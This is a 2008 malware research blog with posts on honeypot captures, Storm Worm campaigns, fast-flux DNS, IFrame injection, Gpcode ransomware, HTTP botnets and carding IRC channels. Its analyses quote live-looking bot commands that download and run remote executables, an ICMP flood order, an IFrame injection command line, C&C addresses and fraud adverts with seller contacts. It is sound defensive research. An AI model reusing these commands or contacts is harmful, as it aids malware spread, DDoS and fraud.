honeyblog - malware

Observing Malware Outbreaks with Honeypots

nospam@example.com (Thorsten Holz) — Sat, 26 Jul 2008 13:05:00 +0200

Low-interaction honeypots like Nepenthes or Amun are good at capturing autonomous spreading malware that propagates via exploiting vulnerabilities in network services: by emulating specific vulnerabilities, these honeypots trick malware into exploiting the honeypot and we can capture a copy of the malware.
These honeypots also allow us to observe outbreaks of new malware samples: since quite many people run Nepenthes or Amun nowadays and also send the samples to cwsandbox.org for automated malware analysis, we can correlate the submissions of many different sensors at a central location. For example, we received the malware sample with MD5 sum cb032b12af742555e60124f6d7d2d2ea from a total of 57 different sensor at the timestamps depicted below:



Timestamp               Filename

2008-01-10 19:36:25     grospolinacb032b12af742555e60124f6d7d2d2eauLa1AA

2008-01-10 22:11:47     nepenthescb032b12af742555e60124f6d7d2d2easBj96A

2008-01-11 00:03:32     nepenthescb032b12af742555e60124f6d7d2d2easm4aaA

2008-01-11 00:18:58     nepenthescb032b12af742555e60124f6d7d2d2eaA

2008-01-11 00:22:22     nepenthescb032b12af742555e60124f6d7d2d2eayK4gcQ

2008-01-11 00:22:56     nepenthescb032b12af742555e60124f6d7d2d2eadOoZcA

2008-01-11 00:34:36     nepenthescb032b12af742555e60124f6d7d2d2eaf92wA

2008-01-11 00:44:56     nepenthescb032b12af742555e60124f6d7d2d2eaBmLfOg

2008-01-11 00:45:09     nepenthescb032b12af742555e60124f6d7d2d2eagv4WoQ

2008-01-11 00:53:59     nepenthescb032b12af742555e60124f6d7d2d2eaOewZcA

2008-01-11 01:11:01     nepenthescb032b12af742555e60124f6d7d2d2eaQANtUA

2008-01-11 01:56:59     nepenthescb032b12af742555e60124f6d7d2d2eaeEtIA

2008-01-11 04:48:11     nepenthescb032b12af742555e60124f6d7d2d2eaYO0fA

2008-01-11 05:32:44     nepenthescb032b12af742555e60124f6d7d2d2eadOoZcA

2008-01-11 06:35:31     nepenthescb032b12af742555e60124f6d7d2d2eaf0fA

2008-01-11 08:21:13     nepenthescb032b12af742555e60124f6d7d2d2eaze0fA

2008-01-11 08:49:09     nepenthescb032b12af742555e60124f6d7d2d2eaSu4fA

2008-01-11 09:25:49     nepenthescb032b12af742555e60124f6d7d2d2eaanj2kA

2008-01-11 09:41:40     nepenthescb032b12af742555e60124f6d7d2d2eaJ8ZcA

2008-01-11 12:00:10     cb032b12af742555e60124f6d7d2d2ea

2008-01-11 13:42:14     nepenthescb032b12af742555e60124f6d7d2d2ea1E4a6A

2008-01-11 14:15:43     nepenthescb032b12af742555e60124f6d7d2d2eaSHkgA

2008-01-11 14:37:06     grospolinacb032b12af742555e60124f6d7d2d2eamKgfA

2008-01-11 14:38:37     nepenthescb032b12af742555e60124f6d7d2d2eabGhXGQ

2008-01-11 18:30:29     nepenthescb032b12af742555e60124f6d7d2d2eaMPofKg

2008-01-11 18:39:25     nepenthescb032b12af742555e60124f6d7d2d2eaGSGoWQ

2008-01-11 20:33:26     nepenthescb032b12af742555e60124f6d7d2d2eab0fA

2008-01-12 04:19:46     nepenthescb032b12af742555e60124f6d7d2d2eauJQiA

2008-01-12 12:12:12     nepenthescb032b12af742555e60124f6d7d2d2eaGDoqMQ

2008-01-12 14:32:15     nepenthescb032b12af742555e60124f6d7d2d2eaSIUgA

2008-01-13 20:37:45     nepenthescb032b12af742555e60124f6d7d2d2eaYO0fA

2008-01-14 17:38:54     nepenthescb032b12af742555e60124f6d7d2d2eaQ8fA

2008-01-14 22:26:54     grospolinacb032b12af742555e60124f6d7d2d2ea2rqiGw

2008-01-15 06:27:12     nepenthescb032b12af742555e60124f6d7d2d2eaM0sA

2008-01-15 09:32:40     nepenthescb032b12af742555e60124f6d7d2d2eaM0sA

2008-01-18 10:20:58     nepenthescb032b12af742555e60124f6d7d2d2eaKEuA

2008-01-19 02:10:38     nepenthescb032b12af742555e60124f6d7d2d2eagfofkA

2008-01-20 05:37:39     nepenthescb032b12af742555e60124f6d7d2d2eaxeoZcA

2008-01-25 09:43:36     nepenthescb032b12af742555e60124f6d7d2d2eaLvAfA

2008-01-29 15:36:08     nepenthescb032b12af742555e60124f6d7d2d2eaBxofsA

2008-01-29 20:47:39     nepenthescb032b12af742555e60124f6d7d2d2eaJ00A

2008-02-01 18:48:12     nepenthescb032b12af742555e60124f6d7d2d2eaEcoA

2008-02-02 12:24:22     nepenthescb032b12af742555e60124f6d7d2d2eawcUgLg

2008-02-02 19:35:56     cb032b12af742555e60124f6d7d2d2ea

2008-02-07 13:59:24     cb032b12af742555e60124f6d7d2d2ea.dat

2008-02-08 15:48:30     nepenthescb032b12af742555e60124f6d7d2d2eaGfoWA

2008-02-14 14:14:03     cb032b12af742555e60124f6d7d2d2eacb032b12af742555...2ea

2008-02-21 14:20:01     nepenthescb032b12af742555e60124f6d7d2d2eaWN0fA

2008-02-28 16:56:53     nepenthescb032b12af742555e60124f6d7d2d2eaoexA

2008-03-03 15:15:39     nepenthescb032b12af742555e60124f6d7d2d2eaA

2008-03-11 02:56:00     nepenthescb032b12af742555e60124f6d7d2d2eaAfA

2008-03-14 11:11:51     nepenthescb032b12af742555e60124f6d7d2d2eaJgfA

2008-03-15 17:31:37     nepenthescb032b12af742555e60124f6d7d2d2eaGGYnA

2008-03-20 10:55:43     nepenthescb032b12af742555e60124f6d7d2d2eacb032b1...2ea

2008-03-20 17:05:07     nepenthescb032b12af742555e60124f6d7d2d2eaoflA

2008-03-31 12:12:02     nepenthescb032b12af742555e60124f6d7d2d2eaYO0fA

2008-04-07 07:06:12     nepenthescb032b12af742555e60124f6d7d2d2eaxMUg3A

2008-04-08 02:37:22     cb032b12af742555e60124f6d7d2d2ea

Each timestamp depicts the first point in time where the specific sensor captured a copy of the malware. As you can see, the malware outbreak happened presumably at January 10, 2008. From then on, honeypot sensors all around the world captured a copy of this specific bot. The CWSandbox report contains more detailed information about the botnet, e.g.:

The bot creates a file named C:\WINDOWS\system32\explorer.exe, which is a copy of itself

It creates a run key for the Windows registry such that the bot is started again after a reboot

The C&C server is located at the IP address 67.43.232.36 and listens on the TCP port 8080

C&C channel is #wawa and the command issued by the botmaster at the time of analysis is: ipscan s.s.s dcom2 -f -s

DIMVA'08 Slides

nospam@example.com (Thorsten Holz) — Tue, 22 Jul 2008 13:56:00 +0200

A quick follow-up to our DIMVA'08 paper on "Learning and Classification of Malware Behavior": the slides from Konrad's talk are now available and provide a quick overview of the topic.

In the near future, we will integrate the results of this paper to the webinterface of cwsandbox.org - stay tuned :)

Interesting Pattern in Storm Worm Traffic

nospam@example.com (Thorsten Holz) — Mon, 21 Jul 2008 17:52:00 +0200

Björn Weiland recently sent me a few graphs with interesting observations he made when tracking the Storm Worm botnet as part of his thesis on detection of advanced botnets.
The first graph visualizes the network communication of a Storm sample when executed on a machine with a private IP address. In that configuration, the bot typically sends out spam e-mails or participates in distributed denial-of-service attacks. The x-axis shows the time, while the y-axis shows the UDP/TCP destination port number the bot communicates on:

The graph shows that the bot first uses NTP to synchronize the clock of the victim's machine. Afterwards, it contacts many other machines, typically on TCP ports < 33.789 (strange port number?!?). After a few minutes, it also starts with spamming (lots of connections on TCP port 25). What is interesting are all the communications that happen on higher port numbers: we can, for example, identify an IP address hosted at Intercage. This IP address is part of the static backend of the botnet. In addition, an IP address related to the University of California in San Diego (UCSD) sticks out, presumably related to their Storm Worm research. I'm not yet sure what all the other IP addresses mean, but presumably all of them are also suspicious and somehow related to the botnet.

The second graph shows the network communication of a sample executed on a machine with a public IP address. In this configuration, the bot is typically used to relay messages or host services related to the botnet. Again, the x-axis depicts a timeline, whereas the y-axis show the TCP / UDP destination port number:

Here we can observe a completely different pattern compared to the first graph. Overall, the full port range is used, with some more dense and some more sparse parts. We can also observe more TCP communication and also quite a lot communication on TCP port 80, which is related to the web sites hosted by the botnet.

The port range between destination port 50,000 and 51,000 is far more dense compared to lower / higher ports as the following figure shows:

This port range is commonly used for RTP / RTCP as defined in RFC 4504 - presumably just a coincidence for Storm Worm.

Does anybody have an explanation for the distribution of destination ports used by Storm Worm? And thanks a lot to Björn for the permission to publish the figures!

New Storm Campaign: Amero

nospam@example.com (Thorsten Holz) — Mon, 21 Jul 2008 16:21:54 +0200

The Storm Worm botnet changed the propagation theme again and now uses a social engineering theme that builds on the weak US dollar and the ongoing financial crisis:

The text above the picture reads:

The U.S. Government began to realize the plan to replace the Dollar with the "Amero", the new currency of the North American Currency Union. Canada, the United States of America and Mexico have resolved to unit in order to resist the Worldwide Financial Crysis. You can become acquainted with the plan of the implementation of Amero, just click on the icon under this text.

From a technical point, nothing seems to change compared to previous versions of the binary. In the last few days, our crawler measured an effective size (i.e., how many bots are online at the moment) of the botnet between six and ten thousand machines. In total, the botnet is still bigger, we observe high churn rates between different crawls.

Fast-Flux Data

nospam@example.com (Thorsten Holz) — Wed, 16 Jul 2008 23:57:00 +0200

Back in February, we published a paper on fast-flux service networks at NDSS'08. The basic idea behind fast-flux networks is a fast change in the mapping between a domain name and the corresponding IP addresses. The attackers use this mechanism to build a proxy-network on top of compromised machines to maintain a robust hosting infrastructure for their services. For more information on this topic, see the paper by the Honeynet Project or our NDSS paper.

To foster research in this area, the data collected during our study is available for research purposes. Up to now, quite a few people mailed me and asked for the data. To make this process a bit more scalable and also minimize the amount of work needed at my side, we decided to simply publish all the data such that everyone can download the raw data and use it for whatever purpose. Today, I uploaded a tarball which contains a summary of the fast-flux data collected over a period of several weeks. The tarball contains a potpourri of different measurements and has a total size of 7.3 MB. It contains about 55K raw dig lookup files and has an unpacked size of about 220 MB. The archive contains the following data:

storm-qavoter.com.log: dig lookups for domain used by the Storm Worm botnet which uses fast-flux techniques

asprox-damnec-hydra.log: dig lookups for Asprox/Damnec botnet which also uses fast-flux techniques

lookups-ff: dig lookups for fast-flux domains, confirmed manually

lookups-spam: dig lookups for various domains found in spam e-mails

lookups-benign: dig lookups for (probable) benign domains, most of them collected via dmoz or Alexa

lookups-ndss: part of the domains used for the NDSS paper

lookups-ndss-ff: suspected fast-flux domains from NDSS paper

So if you are interested in this area and want to learn more about it, just download the archive (7.3 MB) and play with the files :)

#CCpower Only Scam?

nospam@example.com (Thorsten Holz) — Tue, 15 Jul 2008 10:32:00 +0200

Several days ago I blogged about a compromise of our honeypots in which the attacker joined the IRC channel #CCpower. Such a channel is commonly used by attackers to trade stolen credentials like credit cards, ATM pins, social security numbers, or similar things. Again, a small excerpt from within this channel:

- USA-DUMPS: I HAVE VIRGIN USA DUMPS FOR SHOPPING (WITHOUT PIN). LOOKING FOR REAL US CASHIER FOR LONG TERM RELATIONSHIP. MY YAHOO MESSENGER ID IS : DUMPS_SELLER ! RIPPERS DON'T WASTE MY TIME! CONTACT ME ONLY IF YOU'RE FOR REAL. THANK YOU!. - cards: Selling USA dumps for shopping /msg cards- for details.. - User2: Carti Fullz,Paypal Fullz,user eBay, Root,Remote Desktop, Loginuri Wells si boa Sockuri ...etc..Care esti afara sau ai ceva point de facut bani prv me!!POt sa dau Spam pe oRice BAnca NUMAI DE STATE inclusiv eBay si Paypal daca ai pont!!!. - vendors: Spamming for HSBC, Halifax, CIBC. e-trade bank logins. Selling UK, USA, Swedish, Australian cvvs.. - HenryMtcn: Cashouting Uk BanK Logins Halifax Abbey and Natwest Share Guarranted.. - zoRnking: I searching good deals.. with sure (100%) cashout - out rippers - because i work with money upfront on the first deal and the get back after cashout - /msg zoRnking if you accept my rules or add my YM: zornunhackXXX@yahoo.com. - MSR206: Selling atm skimmer + MSR206 with 5 blank magnetic cards , video available for checking the items pvt me for info. - Zenq: Vand Carti Fresh Full Info & Cvv2 (AU,CA,UK,US,IT,SP,EU),Dumpsuri With Pin and Track1,Track2 and Track3 Luate Cu Cipul sau cu Gura de Skimmeri.........Logine Full (Carte + user & password) (BOA,RBC,Desjardins,Paypal,Intesa,Poste.it,Wamu,Wachoavia,Chase,MoneyBookers),Usere Ebay(Seller & Buyer)..RIPPERS OUT (My Contact ICQ = 3972973XX)

Two comments on the previous blog entry pointed out that these channels are commonly used for scams. The first one:

And for the article, I was hanging around on different ccpower networks since the beginning, 90% of these deals are ripoffs. Poor scum nigerians and romanians try to make 20$ deals by ripping eachother off. This is just a PUG what you find on undernet and different networks like unixirc, linuxirc. These people not even criminals just losers in life. I wouldn't bother wasting too much time for watching them. Won't do any good. You will never find any serious criminal group on the internet, since their trust builds in real life.

And the second one:

lol he said the truth!! most of them are rippers and scum bags..and yes, trust is built in real life not on internet!

Does anybody have more information on this topic, for example evidence that the trading activity in these channels is commonly scam and also some kind of proof? I am interested in this topic since the implication would be that the paper by Franklin et al. on the underground economy ("An Inquiry into the Nature and Causes of the Wealth of Internet Miscreants") is not completely right - it would greatly overestimate the real size of the underground economy. Please leave a comment or send me an e-mail to thorsten.holz [at] gmail.com.

DIMVA'08: "Learning and Classification of Malware Behavior"

nospam@example.com (Thorsten Holz) — Thu, 10 Jul 2008 10:06:00 +0200

Today and tomorrow DIMVA'08 takes place in Paris. DIMVA'08 is the Fifth Conference on Detection of Intrusions and Malware & Vulnerability Assessment and organized by the special interest group SIDAR of the German Informatics Society (GI).

Our paper entitled "Learning and Classification of Malware Behavior" is a joint work with Konrad Rieck, Carsten Willems, Patrick Düssel, Pavel Laskov, and Felix Freiling. The paper deals with malware classification, i.e., how to automatically learn malware families using labels. We use (noisy) labels by an anti-virus product and then apply machine learning algorithms to classify malware based on execution traces generated with the help of CWSandbox. In an experiment with over 3,000 previously undetected malware binaries, our system correctly predicted almost 70% of labels assigned by an anti-virus scanner four weeks later. Our method also detects unknown behavior, so that malware families not present in the learning corpus are correctly identified as unknown. The analysis of prominent features inferred by our discriminative models has shown interesting similarities between malware families; in particular, we have discovered that Doomber and Gobot worms derive from the same origin, with Doomber being an extension of Gobot - all in an automated way.

Abstract:
Malicious software in form of Internet worms, computer viruses, and Trojan horses poses a major threat to the security of networked systems. The diversity and amount of its variants severely undermine the effectiveness of classical signature-based detection. Yet variants of malware families share typical behavioral patterns reflecting its origin and purpose. We aim to exploit these shared patterns for classification of malware and propose a method for learning and discrimination of malware behavior. Our method proceeds in three stages: (a) behavior of collected malware is monitored in a sandbox environment, (b) based on a corpus of malware labeled by an anti-virus scanner a malware behavior classifier is trained using learning techniques and (c) discriminative features of the behavior models are ranked for explanation of classification decisions. Experiments with different heterogeneous test data collected over several months using honeypots demonstrate the effectiveness of our method, especially in detecting novel instances of malware families previously not recognized by commercial anti-virus software.

The full paper is now available.

Storm Worm: World War III?

nospam@example.com (Thorsten Holz) — Wed, 9 Jul 2008 07:26:00 +0200

Tonight the Storm Worm botnet changed the propagation theme again. They have a bogus story, but an interesting picture:

Just now US Army's Delta Force and U.S. Air Force have invaded Iran. Approximately 20000 soldiers crossed the border into Iran and broke down the Iran's Army resistance. The video made by US soldier was received today morning. Click on the video to see first minutes of the beginning of the World War III. God save us.

The directory structure of the website is similar to the previous campaigns:

A file called ind.php is included which contains a couple of exploits for common web browser vulnerabilities.
The actual Storm Worm binary is called iran_occupation.exe and it behaves similar to previous versions

So actually nothing really new at the botnet side...
Warning: Please do not visit the website visible in the screenshot, it may harm your computer.

Fast-Flux Techniques in .mobi

nospam@example.com (Thorsten Holz) — Thu, 3 Jul 2008 16:00:00 +0200

Danmec/Asprox is an SQL injection attack tool that is responsible for some aspects of the recent wave of SQL injections (full list maintained by ShadowServer). This malware also uses fast-flux techniques to host some facets of the attacks. Since a few days, the attackers also use the .mobi TLD - the first time I see this TLD being abused this way by malware. The following listing shows the results of a DNS lookup for one of the .mobi domains:

$ dig allocbn.mobi

; <<>> DiG 9.3.4 <<>> allocbn.mobi
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 26203
;; flags: qr rd ra; QUERY: 1, ANSWER: 14, AUTHORITY: 4, ADDITIONAL: 0

;; QUESTION SECTION:
;allocbn.mobi. IN A

;; ANSWER SECTION:
allocbn.mobi. 600 IN A 200.167.230.85
allocbn.mobi. 600 IN A 69.247.175.135
allocbn.mobi. 600 IN A 71.56.42.87
allocbn.mobi. 600 IN A 72.187.108.240
allocbn.mobi. 600 IN A 74.138.199.132
allocbn.mobi. 600 IN A 75.66.193.0
allocbn.mobi. 600 IN A 75.143.150.108
allocbn.mobi. 600 IN A 76.175.178.111
allocbn.mobi. 600 IN A 98.165.213.34
allocbn.mobi. 600 IN A 98.192.74.13
allocbn.mobi. 600 IN A 98.223.61.12
allocbn.mobi. 600 IN A 99.233.217.232
allocbn.mobi. 600 IN A 118.160.173.122
allocbn.mobi. 600 IN A 190.18.116.54

The DNS answer has a short time to live (600 seconds - 10 minutes) and the IP addresses are located in many different networks - a typical sign for fast-flux techniques. Most IP addresses are located in dial-up networks like Comcast and Roadrunner, presumably these machines are infected and compromised machines. When doing a DNS lookup a couple of minutes later, a different set of IP addresses is returned:

;; ANSWER SECTION:
allocbn.mobi. 493 IN A 208.107.82.31 [NEW]
allocbn.mobi. 493 IN A 71.56.42.87
allocbn.mobi. 493 IN A 72.177.224.125 [NEW]
allocbn.mobi. 493 IN A 72.187.175.42 [NEW]
allocbn.mobi. 493 IN A 75.143.150.108
allocbn.mobi. 493 IN A 76.171.151.145 [NEW]
allocbn.mobi. 493 IN A 76.175.178.111
allocbn.mobi. 493 IN A 81.203.14.159 [NEW]
allocbn.mobi. 493 IN A 92.233.227.123 [NEW]
allocbn.mobi. 493 IN A 98.165.213.34
allocbn.mobi. 493 IN A 98.192.74.13
allocbn.mobi. 493 IN A 98.223.61.12
allocbn.mobi. 493 IN A 99.233.217.232
allocbn.mobi. 493 IN A 156.34.132.62 [NEW]

This indicates the "fluxiness" of the domain. By DNS mining, i.e., performing DNS lookups of this domain every TTL +1 seconds, we can observe the botnet behind this attack. In the past week, we found about 1,000 unique bot IP addresses this way.

IFrame Injection Attacks

nospam@example.com (Thorsten Holz) — Fri, 13 Jun 2008 16:56:00 +0200

Attacks against web servers are en vogue nowadays. This can be mass SQL injection attacks that insert malicious JavaScript into web sites or other forms of IFrame injection attacks.

Today we analyzed a malware sample that performs such IFrame injection attacks. The executable with MD5 hash e3e3eb9e00745537a17311a48ddcfd6d is detected by Kaspersky as Backdoor.Win32.Agent.fjs or by ClamAV as PUA.Packed.NPack-3. When executed, the sample creates several files on the hard disk: it drops several benign DLLs such as wpcap.dll and npptools.dll which are all related to packet processing. Furthermore, two executables 3.tmp and 6.tmp are created.

Then the file 6.tmp is executed with the command line parameter

-idx 0 -ip $IP-RANGE -port 80 -insert "< if rame sr c="hXXp://www.XXX.cn/index.htm" width=0 height=0 frameborder=0>"

The intention is that the infected machines should scan a specific network range for web servers on port 80 and then try to inject a specific IFrame into vulnerable servers.

An analysis of the injected site leads to more malware. The HTML file contains for example four more IFrames:

IF RAME sr c="hXXp://www.XXX.cn/index.files/flash.htm" frameBorder=0 width=100 scrolling=no height=1>
IF RAME sr c="hXXp://www.XXX.cn/index.files/real.htm" frameBorder=0 width=100 scrolling=no height=1>
IF RAME sr c="hXXp://www.XXX.cn/index.files/614.htm" frameBorder=0 width=100 scrolling=no height=1>
IF RAME sr c="hXXp://www.XXX.cn/web/index.htm" frameBorder=0 width=100 scrolling=no height=1>

As the names suggest, these IFrames contain exploits against well-known vulnerabilities in applications such as Flash or Real Player 11. Each of these exploits tries to install additional malware.

Gpcode.ak vs. CWSandbox

nospam@example.com (Thorsten Holz) — Tue, 10 Jun 2008 19:04:00 +0200

Recently a new variant of Gpcode was detected by the researchers from Kaspersky Lab. Gpcode is a form of ransomware, a pretty nasty form of malware that is used in extortion attempts. The basic idea of such malware is to encrypt certain files on the hard disk with a key only known to the attacker and then blackmail the victim to press money.

Upon startup, Gpcode.ak searches for specific files on the disk (extensions are for example .htm, .jpg, and .inc) and encrypts them with a 1024 bit RSA key. The file extension is then replaced with $ORIGINAL._CRYPT. Once this is finished, the malware displays a pop-up with the following text:

Your files are encrypted with RSA-1024 algorithm. To recovery your files you need to buy our decryptor. To buy decrypting tool contact us at: cipher4000@yahoo.com

Furthermore, also a file named !READ_ME!.txt is created on the disk that contains the following text:

Your files are encrypted with RSA-1024 algorithm.
To recovery your files you need to buy our decryptor.
To buy decrypting tool contact us at: cipher4000@yahoo.com

=== BEGIN ===
AD7D6889
010200000168000000A400008EE1630FA688F194
42766F3AE19D5483AAE44C246F66C15F5C6D0E38
0B402EF1B67A0FF10A8A08CADB2DEA19EBD957EF
151ED9365CD730BE54263C3E2FDCEDF8546FF33E
5017032833DCB0C306EA28D79CD6DB4C0E7CE96D
3B84E83EEC84740FED2D64B672148E6F86B06B16
890102FF0D22AE42D3CD4B0F7D7E2AD0A5C0724C
=== END ===

Kasperky Labs called for aid to "Help crack Gpcode", but I doubt that cracking this key is successful. Dancho has some more info on Gpcode.ak in his blog. Furthermore, the full CWSandbox report is available.

HTTP-based Botnets

nospam@example.com (Thorsten Holz) — Sat, 7 Jun 2008 15:30:00 +0200

We observe more and more botnets using HTTP-based communication channels. Quite often, these bots are used for DDoS attacks as the following example explains. We recently analyzed a bot with CWSandbox (MD5: 112ccb580b0013f967b6ba991802850d) that first performs the usual steps during a bot infection, e.g., copying itself to the Windows system folder and adding registry keys such that the bot is started as a service after a reboot. The bot then issues the following (obfuscated) HTTP request:

POST /ddd/stat.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: life-tablets.xxx
Content-Length: 27
Cache-Control: no-cache

id=xMACHINENAME_0&build_id=1362B8E

The answer from the server is:

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Jun 2008 19:59:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close

fc
MTA7MjAwMDsxMDsxOzA7MzA7MTAwOzM7MjA7MTAwMDsy
MDAwI2dldCBodHRwOi8vZGZ0cmVvLmNvbS9sZi9lL2kuZXhl
O2dldCBodHRwOi8vZGZ0cmVvLmNvbS9sZi9lLzEwMDAuZXh
lO2dldCBodHRwOi8vbGlmZS10YWJsZXRzLmNuL2xmL2xvY
WQuZXhlO2Zsb29kIGljbXAgbGliZXJ0eXJlc2VydmVkaXJlY3R
vcnkuY29tIzEwIw==
0

The response is base64-encoded and decoding leads to the following (obfuscated) commands:

10;2000;10;1;0;30;100;3;20;1000;2000#
get hxxp://dftreo.xxx/lf/e/i.exe;
get hxxp://dftreo.xxx/lf/e/1000.exe;
get hxxp://life-tablets.xxx/lf/load.exe;
flood icmp TARGET.COM&10;

Thus three additional malware binaries are installed on the compromised machine and the bot also starts an ICMP-based DDoS attack against the specified target.

Good ol' #CCpower

nospam@example.com (Thorsten Holz) — Fri, 6 Jun 2008 00:06:00 +0200

A few weeks ago, one of our honeypots was hacked and the attacker installed an IRC bouncer on the machine. Nothing too spectacular, but nevertheless interesting since we can then observe how the attackers communicate with each other and what channels they use. The interesting part is that the attackers joined one of the well-known carding channels, in which credit card infos, Paypal accounts, PINs, and other stolen information is traded. Here a small excerpt, the full dump is many megabytes in size:

- DonDax SELLING Selling USA/Europe VISA/MC DUMPS ,BANKS(halifax,HSBC etc ),Fulls(PIN,DOB,SSN),Paypals(email),EGOLD, and Cvv2's(worldwide). No ripping and NO TESTS. - Hicks Cashout WESTERN UNION on UK LONDON / GREECE- ATHEENS !!! - Hicks Selling dumps+pin new ones every week and FULLS ALSO !!! - JuanesXloT Scot Epic partea ta 50% !! DE asemenea scot conturi caja madrid partea ta 50% ! Caut spammer bun sa fim parteneri am eu scamuri partea ta 50% ! Sau daca ai tu carduri care merg facute cu 1010000... si merg scoase - M3ster Daca doresti sa-ti achizitionezi un RooT de :scan / flood / pagina / emech / psybnc sau poate un remote desktop, Shell , sau poate vrei un site, Ofer Hosting, cc / paypal / spam /drone /boti , Tot ce trebuie sa - Maka` I need email list all country big file on email list like 500 mb 1-2 gb if you have prv me - d3x SELLING EU DUMPS WITH PIN [TRACK1/TRACK2+PIN] || PAYPAL ACCOUNTS WITH GOOD BALANCE [VERIFIED/UNVERIFIED] || FULLZ AND CVV2 [US/EU] || DONT WASTE MY TIME OR I WILL IGNORE YOU || FOR DEAL ICQ : 436306694 - traxpro Selling USA/Worldwide VISA/MC dumps from hotels. Natural track. Various bins are available. Offering tutorials, software and other additional info for all my clients. - traxpro Spamming for HSBC, Halifax, CIBC. e-trade bank logins. Selling UK, USA, Swedish, Australian cvvs. - Selling CVV, Checked and Verified 5$ each, E-gold and WU(for bigger orders) Accepted - Charleskj Am Nevoie De Un Php Mailer Uplodat Care Trimite Inbox , Cine Are Prv Me , Pot Oferi Multe / Need A Php Mailer Uploated That Sends Inbox , Who Have Please Prv Me , Can Offer Many Things !!!

Different people offer a diverse set of stolen credentials, which can then be abused - quite interesting to observe all the trading activity (although we can only see the advertisements and not the actual trades). Last year, Franklin et al. published a study entitled "An Inquiry into the Nature and Causes of the Wealth of Internet Miscreants". In this paper, the authors present an analysis of 13 million public IRC messages obtained from several networks and channels, collected over a 7 month period. The particular channel we observed is one of them - time for some analysis to validate their measurements...

Storm Worm Dead?

nospam@example.com (Thorsten Holz) — Tue, 3 Jun 2008 11:59:57 +0200

The Internet Storm Center had today a story about a "New Stormworm download site". The Storm Worm botnet is thus still live and propagating. However, the size of the botnet is decreasing significantly: Currently, only about 8.2K hosts are online within the network (based on measurement results with the crawler presented in the LEET'08 paper). Compared to the size a few months ago (40K in January, even more a few months earlier), this is a strong decrease. Will the botnet thus become obsolete in the near future?

The CWSandbox analysis of the Storm Worm sample loveyou.exe (MD5: 0679c17b9072d378cb0a39272fed98f5) shows the typical signs of a Storm sample: It first drops a file called C:\WINDOWS\farkrish.exe and also the typical peer-list:

H:\WINDOWS\farkrish.config [peers] 000011213D362D29747E07640874096F = C933DDCB2E6E00 H:\WINDOWS\farkrish.config [peers] 01006C75C1523825A27A642FD05F6859 = BDA2AF3A4A3600 H:\WINDOWS\farkrish.config [peers] 02003727703C8435FA41B70F977E6055 = 53C8003932CD00 H:\WINDOWS\farkrish.config [peers] 0300B623D3499048CC4BB30B5857C959 = C86E5D666A2C00 H:\WINDOWS\farkrish.config [peers] 04000A4C7B4BBC41AE5B6B486A00F613 = 7B11B24647B600 H:\WINDOWS\farkrish.config [peers] 05002744C35A572A932662411A117715 = 7B150612413A00 H:\WINDOWS\farkrish.config [peers] 06000772D412A4727D1B415B7A73F450 = 183C4148226F00 H:\WINDOWS\farkrish.config [peers] 07000600822E65796C39356C6E3C750E = 7B12A2E745FA00 H:\WINDOWS\farkrish.config [peers] 0800F81A9A4D644D6566FC73591C0B5F = C925ECC4375C00 H:\WINDOWS\farkrish.config [peers] 090007168A1C884C2D60D12FD900D86E = 7D19C551116E00 H:\WINDOWS\farkrish.config [peers] 0A00C95E9909F25F7844635C9D0FAD62 = BDA663FA77E400 H:\WINDOWS\farkrish.config [peers] 0B00364A9F3CC648DC1EE87E0E022E70 = 53CB22366F8D00 H:\WINDOWS\farkrish.config [peers] 0C00C65A0A69484DDF47D724A81F3B52 = A007E95F321F00 H:\WINDOWS\farkrish.config [peers] 0D00DE0895137F5AC2376814D6415F4D = 40FEB3F7645700 H:\WINDOWS\farkrish.config [peers] 0E007A157B4A305BD352D1039829B24C = 43954E9F0F4D00 H:\WINDOWS\farkrish.config [peers] 0F00042A5F72C81BD16DDB4B7A38DD14 = 3EFBBF4273AC00 H:\WINDOWS\farkrish.config [peers] 1000A535661B0414FA6556507D75880A = CBDA9AA318CD00 H:\WINDOWS\farkrish.config [peers] 1100556AD128A56385603C71BF3A3476 = 4421178C717600 H:\WINDOWS\farkrish.config [peers] 12000A1B5609B740B609833F2C11B212 = C93AE62B6AFA00 H:\WINDOWS\farkrish.config [peers] 1300907BD345E730C048E311A3705B21 = 539C8C79473500 H:\WINDOWS\farkrish.config [peers] 1400FA75B31AF97F4564B80F49060C72 = 477196302BC400 H:\WINDOWS\farkrish.config [peers] 1500D1510455D5005746601F4E4A584F = BD9C1C33213F00 [...]

Besides this, farkrish.exe is allowed to access the network and the infected machines syncs the time via NTP. The content of the UDP packets that are sent out have the same structure as always:

0000     10 a6 e6 22 f9 ca cc b0 2d a2 8c c7 de 57 ba 53

0010     5e c5 e5 a6 17 02 48 31 46

Thus it seems that there are no major changes in this new update release.

Annoying Botnets

nospam@example.com (Thorsten Holz) — Sat, 31 May 2008 14:44:00 +0200

At cwsandbox.org, we receive quite a few binaries these days. However, we receive also lots of "uninteresting" files like hundreds of copies of Allaple, which we basically filter out in an automated way.
A specific annoying family of malware sample we receive a lot are all the bots related to the two domains proxim.ircgalaxy.pl and ircd.zief.pl. We receive tens or even hundreds of sample of these bots per day. Both domains map to the same IP address 85.114.137.60, which belongs to a co-location provider in Germany. The provider did not yet react to abuse complaints, thus I publish a few more details about this botnet - perhaps someone else can help. The botnet related to the first domains has the Command & Control server listening on TCP port 65520, while the second botnet has the C&C server at TCP port 80. An example communication of the bots looks like:

NICK rzyaaqgs

USER f020501 . . :-Service Pack 2

JOIN &virtu

:* PRIVMSG rzyaaqgs :!get http://dl2.teenpassage.com/~grander/unpr.exe